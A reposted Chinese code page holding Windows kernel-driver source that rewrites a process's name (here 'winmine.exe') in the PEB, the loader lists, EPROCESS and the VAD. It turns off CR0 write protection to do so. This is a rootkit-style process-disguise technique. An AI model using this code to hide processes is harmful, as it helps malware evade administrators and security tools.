首页 > 代码库 > 转载 修改进程名
转载 修改进程名
//Fypher
//http://hi.baidu.com/nmn714
VOID ChangeName(ULONG pProcess){
ULONG peb,ProcessParameters,ldr;
ULONG InLoadOrderModuleList;
ULONG InMemoryOrderModuleList;
ULONG tmp;
KAPC_STATE kapc;
PUCHAR str;
PWCHAR wstr;
//get PEB
peb=*(PULONG)(pProcess + 0x1b0);
KeStackAttachProcess((PEPROCESS)pProcess,&kapc);
__try{
ProcessParameters = *(PULONG)(peb + 0x010);
//ImagePathName
FindAndChangeUni(ProcessParameters+0x038);
//CommandLine
FindAndChangeUni(ProcessParameters+0x040);
//WindowTitle
FindAndChangeUni(ProcessParameters+0x070);
//Ldr
ldr = *(PULONG)(peb + 0x00c);
//InLoadOrderModuleList->FullDllName
InLoadOrderModuleList = *(PULONG)(ldr+0x00c);
FindAndChangeUni(InLoadOrderModuleList+0x024);
//InLoadOrderModuleList->BaseDllName
FindAndChangeUni(InLoadOrderModuleList+0x02c);
//InMemoryOrderModuleList->FullDllName
InMemoryOrderModuleList = *(PULONG)(ldr+0x014);
FindAndChangeUni(InMemoryOrderModuleList+0x024);
}__except(1){
KdPrint(("exception occured!"));
}
KeUnstackDetachProcess (&kapc);
//EPROCESS-->ImageFileName
FindAndChangeA(pProcess+0x174,16);
//EPROCESS-->SeAuditProcessCreationInfo->ImageFileName
FindAndChangeUni(*(PULONG)(pProcess + 0x1F4));
//EPROCESS->SectionObject->Segment->ControlArea->FileObject->FileName
//should use MmIsAddressValid to verify
tmp=*(PULONG)(pProcess+0x138);
tmp=*(PULONG)(tmp+0x14);
tmp=*(PULONG)tmp;
tmp=*(PULONG)(tmp+0x024);
FindAndChangeUni(tmp+0x030);
//VAD
//should use MmIsAddressValid to verify
tmp=*(PULONG)(pProcess+0x11c);
tmp=*(PULONG)(tmp+0x10);
tmp=*(PULONG)(tmp+0x018);
tmp=*(PULONG)(tmp+0x024);
FindAndChangeUni(tmp+0x030);
}
//Fypher
//http://hi.baidu.com/nmn714
VOID FindAndChangeUni(ULONG strAddr){
PUNICODE_STRING uniStr = (PUNICODE_STRING)strAddr;
ULONG len = uniStr->Length / 2;
ULONG maxLen = uniStr->MaximumLength / 2;
PWCHAR str = uniStr->Buffer;
ULONG i=0;
if(!str || len<11|| maxLen<11 )
return;
for(i=0;i<= len - 11;++i){
if(!_wcsnicmp(str+i,L"winmine.exe",11))
break;
}
if(i>len - 11)
return;
_asm{
cli
mov eax, cr0
and eax, not 0x10000
mov cr0, eax
}
//str可能是PEB中的,故try之
__try{
str[i+3]=L‘x‘;
str[i+4]=L‘x‘;
str[i+5]=L‘o‘;
str[i+6]=L‘o‘;
}__except(1){
}
_asm{
mov eax, cr0
or eax,0x10000
mov cr0,eax
sti
}
}
VOID FindAndChangeA(ULONG strAddr,ULONG len){
PUCHAR str = (PUCHAR)strAddr;
ULONG i=0;
if(!str || len<11 )
return;
for(i=0;i<= len - 11;++i){
if(!_strnicmp(str+i,"winmine.exe",11))
break;
}
if(i>len - 11)
return;
_asm{
cli
mov eax, cr0
and eax, not 0x10000
mov cr0, eax
}
//str可能是PEB中的,故try之
__try{
str[i+3]=‘x‘;
str[i+4]=‘x‘;
str[i+5]=‘o‘;
str[i+6]=‘o‘;
}__except(1){
}
_asm{
mov eax, cr0
or eax,0x10000
mov cr0,eax
sti
}
}
转载 修改进程名